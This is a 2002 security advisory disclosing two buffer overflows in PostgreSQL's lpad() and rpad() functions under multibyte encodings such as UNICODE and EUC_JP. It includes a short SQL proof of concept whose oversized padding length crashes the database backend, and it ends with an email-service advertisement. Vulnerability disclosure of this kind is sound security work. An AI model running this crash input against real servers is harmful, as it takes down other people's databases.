//@(#) Mordred Labs advisory 0x0004 Release data: 20/08/02 Name: Two buffer overflows in PostgreSQL Versions affected: all versions Conditions: multibyte support Risk: average --[ Description: I guess all of you already hear about the PostgreSQL. If not, try to visit http://www.postgresql.org/idocs/index.php?preface.html#INTRO-WHATIS. There are two buffer overflows in src/backend/utils/adt/oracle_compat.c. 1) lpad(text, integer, text) function 2) rpad(text, integer, text) function --[ Details: The code for this functions is src/backend/utils/adt/oracle_compat.c::lpad() and src/backend/utils/adt/oracle_compat.c::rpad() respectively. The code suffers from a buffer overflow (of course). --[ How to reproduce: shell> pgsql template1 postgres template1=# select version(); version ----------------------------------------------------------- PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96 (1 row) template1=# create database my_db with encoding='UNICODE'; CREATE DATABASE template1# \c my_db You are now connected to database my_db. my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy'); pqReadData() -- backend closed the channel unexpectedly. This probably means the backend terminated abnormally before or while processing the request. The connection to the server was lost. Attempting reset: Failed. !# The same for rpad() function. The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR, EUC_TW, UNICODE, MULE_INTERNAL. --[ Solution Secure coding of web applications, input validation checks...etc... ________________________________________________________________________ This letter has been delivered unencrypted. We'd like to remind you that the full protection of e-mail correspondence is provided by S-mail encryption mechanisms if only both, Sender and Recipient use S-mail. Register at S-mail.com: http://www.s-mail.com/inf/en
